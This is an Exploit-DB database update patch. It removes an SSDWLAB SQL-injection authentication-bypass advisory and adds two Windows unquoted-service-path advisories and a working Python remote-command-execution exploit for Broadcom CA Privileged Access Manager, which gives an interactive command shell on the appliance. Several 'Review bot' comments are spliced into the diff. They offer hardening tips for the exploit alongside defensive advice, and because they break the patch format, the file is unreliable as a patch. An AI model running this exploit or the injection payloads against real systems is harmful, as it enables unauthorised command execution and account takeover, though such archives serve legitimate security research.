From efa6ef060e644dcdf0a4ebaa711b698914aeade8 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 6 Dec 2019 05:02:01 +0000
Subject: [PATCH] DB: 2019-12-06

5 changes to exploits/shellcodes

NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path
Amiti Antivirus 25.0.640 - Unquoted Service Path
SSDWLAB 6.1 - Authentication Bypass
Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
---
 exploits/aspx/webapps/47742.txt | 76 -------------------------------
 exploits/windows/local/47746.txt | 25 ++++++++++
 exploits/windows/local/47747.txt | 39 ++++++++++++++++
 exploits/windows/webapps/47748.py | 71 +++++++++++++++++++++++++++++
 files_exploits.csv | 4 +-
 5 files changed, 138 insertions(+), 77 deletions(-)
 delete mode 100644 exploits/aspx/webapps/47742.txt
 create mode 100644 exploits/windows/local/47746.txt
 create mode 100644 exploits/windows/local/47747.txt
 create mode 100755 exploits/windows/webapps/47748.py

diff --git a/exploits/aspx/webapps/47742.txt b/exploits/aspx/webapps/47742.txt
deleted file mode 100644
index 1e3dfa242..000000000
--- a/exploits/aspx/webapps/47742.txt
+++ /dev/null
@@ -1,76 +0,0 @@ -# Exploit Title: SSDWLAB 6.1 - Authentication Bypass -# Date: 2019-10-01 -# Exploit Author: Luis Buendía (exoticpayloads) -# Vendor Homepage: http://www.sbpsoftware.com/ -# Version: 6.1 -# Tested on: IIS 7.5 -# CVE : Pending -#Description: By injection on the SOAP function in the EditUserPassword function, it is possible to create a "fake" user and authenticate with it. - -Request to the EditUserPassword Function - -POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1 -Host: XXXXXXX.com -Content-Type: text/xml; charset=utf-8 -Content-Length: 462 -SOAPAction: "http://tempuri.org/EditUserPassword" - - - - - - ' or 1=1 -- - string - string - ENG - - - - -Example of Response when injection is succesfull - -HTTP/1.1 200 OK -Cache-Control: private, max-age=0 -Content-Type: text/xml; charset=utf-8 -X-AspNet-Version: 4.0.30319 -X-Powered-By: XXX.XXX -Content-Length: 421 - -0 - -Request to Login After Successful Request - -POST /PATH-TO-WEB-SERVICE/WebService.asmx HTTP/1.1 -Host: XXXXXXX.com -User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Connection: close -Referer: https://XXXXXXX.com/PATH-TO-WEB-SERVICE/main.swf/[[DYNAMIC]]/2 -Content-Type: text/xml; charset=utf-8 -SOAPAction: "http://tempuri.org/Login" -Content-Length: 406 - - - - - ' or 1=1 -- - string - ENG - - - - -Example of succesfull login - -HTTP/1.1 200 OK -Cache-Control: private, max-age=0 -Content-Type: text/xml; charset=utf-8 -Vary: Accept-Encoding -X-AspNet-Version: 4.0.30319 -X-Powered-By: XXX.XXX -Connection: close -Content-Length: 422 - -0d62cc3c0b2e3413cb8b4a85b0fa6177b \ No newline at end of file diff --git a/exploits/windows/local/47746.txt b/exploits/windows/local/47746.txt new file mode 100644 index 000000000..27dedca39 --- /dev/null +++ b/exploits/windows/local/47746.txt 
@@ -0,0 +1,25 @@
+#Exploit Title: NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path
+#Exploit Author : ZwX
+#Exploit Date: 2019-12-04
+#Vendor Homepage : http://www.netgate.sk/
+#Link Software : http://www.netgate.sk/download/download.php?id=5
+#Tested on OS: Windows 7
+
+
+#Analyze PoC :
+==============
+
+
+C:\Users\ZwX>sc qc NGDatBckpSrv
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: NGDatBckpSrv
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\NETGATE\Data Backup\DataBackupSrv.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : NETGATE Data Backup Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/47747.txt b/exploits/windows/local/47747.txt
new file mode 100644
index 000000000..2a28e4cb3
--- /dev/null
+++ b/exploits/windows/local/47747.txt
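Review bot: The advisory stops at the `sc qc` output and never states the condition that makes an unquoted `BINARY_PATH_NAME` a privilege-escalation issue: a non-administrative user must be able to create files in one of the directories along `C:\Program Files\NETGATE\Data Backup\`, and the default Windows ACLs on `C:\` and `C:\Program Files` refuse that, so the transcript alone does not demonstrate exploitability on a default install. A line after the transcript such as `#Note: only relevant where a standard user can write to C:\ or C:\Program Files\NETGATE\ (check with icacls); remediation is to quote the service ImagePath` would let readers rate the risk and would hand the vendor the fix. The same gap is in 47747.txt in the next hunk, which lists two services with the same shape of path.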
@@ -0,0 +1,39 @@
+#Exploit Title: Amiti Antivirus 25.0.640 - Unquoted Service Path
+#Exploit Author : ZwX
+#Exploit Date: 2019-12-04
+#Vendor Homepage : http://www.netgate.sk/
+#Link Software : https://www.netgate.sk/download/download.php?id=11
+#Tested on OS: Windows 7
+
+
+#Analyze PoC :
+==============
+
+
+C:\Users\ZwX>sc qc ScsiAccess
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: AmitiAvHealth
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusHealth.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Amiti Antivirus Health Check
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\ZwX>sc qc AmitiAvSrv
+[SC] QueryServiceConfig réussite(s)
+
+SERVICE_NAME: AmitiAvSrv
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti Antivirus\AmitiAntivirusSrv.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Amiti Antivirus Engine Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/webapps/47748.py b/exploits/windows/webapps/47748.py
new file mode 100755
index 000000000..ed8ed30af
--- /dev/null
+++ b/exploits/windows/webapps/47748.py
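Review bot: The first transcript's prompt line, `C:\Users\ZwX>sc qc ScsiAccess`, queries a service name that appears nowhere else in the file, yet the output beneath it is for `SERVICE_NAME: AmitiAvHealth`; the line looks like it was carried over from a different advisory and should read `C:\Users\ZwX>sc qc AmitiAvHealth` so the evidence matches the claim. The second transcript (`sc qc AmitiAvSrv`) is internally consistent. Since the two `BINARY_PATH_NAME` values share the `C:\Program Files\NETGATE\Amiti Antivirus\` prefix, one remediation line covering both services (quote the path) would be enough.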
@@ -0,0 +1,71 @@
+# Title: Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution
+# Author: Peter Lapp
+# Date: 2019-12-05
+# Vendor: https://techdocs.broadcom.com/us/product-content/recommended-reading/security-notices/ca20180614-01--security-notice-for-ca-privileged-access-manager.html
+# CVE: CVE-2018-9021 and CVE-2018-9022
+# Tested on: v2.8.2
+
+import urllib2
+import urllib
+import ssl
+import sys
+import json
+import base64
+
+
+ctx = ssl.create_default_context()
+ctx.check_hostname = False
+ctx.verify_mode = ssl.CERT_NONE
+
+
+def send_command(ip, cmd):
+ cmd = urllib.quote_plus(cmd)
+ url = 'https://'+ip+'/ajax_cmd.php?cmd=AD_IMPORT&command=add&groupId=123&importID=|'+cmd+'+2>%261||&deviceMode=test'
+ request = urllib2.Request(url, None)
+ response = urllib2.urlopen(request, context=ctx)
+ result = json.load(response)
+ return result['responseData']
+
+def get_db_value():
+ cmd = "echo select value from configuration_f where name = 'ssl_vpn_network' | mysql -u root uag"
+ db_value = send_command(ip,cmd)
+ db_value = db_value.split('\n')[1]
+ return db_value
+
+def encode_payload(cmd):
+ sql_string = "update configuration_f set value='\\';"+cmd+" > /tmp/output;\\'' where name='ssl_vpn_network'"
+ cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
+ return cmd
+
+def restore_sql(value):
+ sql_string = "update configuration_f set value='"+value+"' where name='ssl_vpn_network'"
+ cmd = "echo "+base64.b64encode(sql_string)+" | base64 -d | mysql -u root uag "
+ send_command(ip,cmd)
+
+def main():
+ print '''Xceedium Command Execution PoC by Peter Lapp(lappsec)'''
+
+ if len(sys.argv) != 2:
+ print "Usage: xceedium_rce.py "
+ sys.exit()
+
+ global ip
+ ip = sys.argv[1]
+ print 'Enter commands below. 
Type exit to quit'
+
+ while True:
+ cmd = raw_input('# ')
+ if cmd == "exit":
+ sys.exit()
+ orig_value = get_db_value()
+ payload = encode_payload(cmd)
+ send_command(ip, payload)
+ send_command(ip, 'echo -e openvpn\\n | ncat --send-only 127.0.0.1 2210')
+ output = send_command(ip, 'cat /tmp/output')
+ print output
+ restore_sql(orig_value)
+
+
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index a730dbf47..635523c9d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10825,6 +10825,8 @@ id,file,description,date,author,type,platform,port
 47735,exploits/xml/local/47735.txt,"Microsoft Excel 2016 1901 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
 47740,exploits/xml/local/47740.txt,"Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass",2019-12-03,hyp3rlinx,local,xml,
 47743,exploits/xml/local/47743.txt,"Microsoft Visual Basic 2010 Express - XML External Entity Injection",2019-12-04,ZwX,local,xml,
+47746,exploits/windows/local/47746.txt,"NETGATE Data Backup 3.0.620 - 'NGDatBckpSrv' Unquoted Service Path",2019-12-05,ZwX,local,windows,
+47747,exploits/windows/local/47747.txt,"Amiti Antivirus 25.0.640 - Unquoted Service Path",2019-12-05,ZwX,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
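Review bot: In `main()`, `restore_sql(orig_value)` runs only if the three `send_command` calls before it return, so any exception from `urllib2.urlopen` (timeout, HTTP error, non-JSON body) leaves the appliance's `ssl_vpn_network` configuration row holding the value written by `encode_payload` — a lasting change to the target rather than a transient test; wrap the block from `send_command(ip, payload)` through `print output` in `try:` … `finally: restore_sql(orig_value)`, and have `get_db_value()` check that `split('\n')` produced a second element before indexing, since an empty query result raises `IndexError`. Style: `send_command` takes `ip` as a parameter while `get_db_value` and `restore_sql` read the `global ip` set in `main()`; passing `ip` through consistently would remove the `global`. The file is created with mode 100755 but has no shebang and is Python 2 only (`urllib2`, print statements, `raw_input`), so a first line `#!/usr/bin/env python2` would make the executable bit meaningful and save readers a failed run. For defenders, the request shape in `send_command` — `ajax_cmd.php` with `cmd=AD_IMPORT` and a `|` inside `importID` — is what to alert on in the web-server access log while patching per the Broadcom notice linked in the header.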
@@ -42053,6 +42055,6 @@ id,file,description,date,author,type,platform,port
 47738,exploits/hardware/webapps/47738.txt,"Intelbras Router RF1200 1.1.3 - Cross-Site Request Forgery",2019-12-03,"Prof. Joas Antonio",webapps,hardware,80
 47739,exploits/php/webapps/47739.php,"Revive Adserver 4.2 - Remote Code Execution",2019-12-03,crlf,webapps,php,
 47741,exploits/php/webapps/47741.txt,"Online Clinic Management System 2.2 - HTML Injection",2019-12-04,"Cemal Cihad ÇİFTÇİ",webapps,php,
-47742,exploits/aspx/webapps/47742.txt,"SSDWLAB 6.1 - Authentication Bypass",2019-12-04,"Luis Buendía",webapps,aspx,
 47744,exploits/hardware/webapps/47744.txt,"Cisco WLC 2504 8.9 - Denial of Service (PoC)",2019-12-04,SecuNinja,webapps,hardware,
 47745,exploits/php/webapps/47745.txt,"OwnCloud 8.1.8 - Username Disclosure",2019-12-04,"Daniel Moreno",webapps,php,
+47748,exploits/windows/webapps/47748.py,"Broadcom CA Privilged Access Manager 2.8.2 - Remote Command Execution",2019-12-05,"Peter Lapp",webapps,windows,